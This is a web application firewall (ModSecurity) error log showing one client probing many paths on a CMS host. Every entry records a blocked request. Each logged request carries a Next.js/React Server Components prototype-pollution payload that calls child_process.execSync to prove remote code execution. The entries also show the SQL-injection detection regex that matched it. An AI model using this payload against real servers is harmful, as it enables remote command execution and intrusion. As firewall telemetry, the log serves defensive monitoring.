{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/ru"] [unique_id "aaZAcP2xhCLtpShpTOoysQAAANY"] [Tue Mar 03 03:59:12.517203 2026] [:error] [pid 21860:tid 21868] [client 172.94.9.249:47710] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/cron"] [unique_id "aaZAcPU_evpVetAt05Vh3QAAAAQ"] [Tue Mar 03 03:59:12.517551 2026] [:error] [pid 21860:tid 21870] [client 172.94.9.249:47602] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/analytics"] [unique_id "aaZAcPU_evpVetAt05Vh3gAAAAY"] [Tue Mar 03 03:59:12.518487 2026] [:error] [pid 21979:tid 21985] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en-US"] [unique_id "aaZAcP2xhCLtpShpTOoysgAAAMQ"] [Tue Mar 03 03:59:12.518689 2026] [:error] [pid 21862:tid 21914] [client 172.94.9.249:47656] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/billing"] [unique_id "aaZAcPh_lrWoDSo4I3Rn0AAAAIk"] [Tue Mar 03 03:59:12.519108 2026] [:error] [pid 21979:tid 21997] [client 172.94.9.249:48028] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/store"] [unique_id "aaZAcP2xhCLtpShpTOoyswAAANA"] [Tue Mar 03 03:59:12.519988 2026] [:error] [pid 21862:tid 21940] [client 172.94.9.249:47648] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "aaZAcPh_lrWoDSo4I3Rn0QAAAJY"] [Tue Mar 03 03:59:12.520478 2026] [:error] [pid 21979:tid 21984] [client 172.94.9.249:47980] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/pl"] [unique_id "aaZAcP2xhCLtpShpTOoytAAAAMM"] [Tue Mar 03 03:59:12.520719 2026] [:error] [pid 21979:tid 21988] [client 172.94.9.249:48200] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/about"] [unique_id "aaZAcP2xhCLtpShpTOoytQAAAMc"] [Tue Mar 03 03:59:12.521004 2026] [:error] [pid 21979:tid 21991] [client 172.94.9.249:47876] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "aaZAcP2xhCLtpShpTOoytgAAAMo"] [Tue Mar 03 03:59:12.522837 2026] [:error] [pid 21862:tid 21900] [client 172.94.9.249:48110] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "aaZAcPh_lrWoDSo4I3Rn0gAAAII"] [Tue Mar 03 03:59:12.523012 2026] [:error] [pid 21979:tid 21989] [client 172.94.9.249:47768] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en-GB"] [unique_id "aaZAcP2xhCLtpShpTOoytwAAAMg"] [Tue Mar 03 03:59:12.523277 2026] [:error] [pid 21979:tid 21981] [client 172.94.9.249:47824] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/console"] [unique_id "aaZAcP2xhCLtpShpTOoyuAAAAMA"] [Tue Mar 03 03:59:12.524544 2026] [:error] [pid 21861:tid 21929] [client 172.94.9.249:47798] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/pt-BR"] [unique_id "aaZAcNsyBa6FPxjfniwsgQAAAFQ"] [Tue Mar 03 03:59:12.524648 2026] [:error] [pid 21979:tid 21994] [client 172.94.9.249:47972] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/sign-in"] [unique_id "aaZAcP2xhCLtpShpTOoyuQAAAM0"] [Tue Mar 03 03:59:12.524678 2026] [:error] [pid 21860:tid 21888] [client 172.94.9.249:47982] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/zh-CN"] [unique_id "aaZAcPU_evpVetAt05Vh3wAAABg"] [Tue Mar 03 03:59:12.525711 2026] [:error] [pid 21862:tid 21932] [client 172.94.9.249:48178] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "aaZAcPh_lrWoDSo4I3Rn0wAAAJI"] [Tue Mar 03 03:59:12.525716 2026] [:error] [pid 21862:tid 21916] [client 172.94.9.249:48092] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "aaZAcPh_lrWoDSo4I3Rn1AAAAIo"] [Tue Mar 03 03:59:12.527578 2026] [:error] [pid 21860:tid 21877] [client 172.94.9.249:48088] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "aaZAcPU_evpVetAt05Vh4AAAAA0"] [Tue Mar 03 03:59:12.527713 2026] [:error] [pid 21860:tid 21876] [client 172.94.9.249:48146] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new 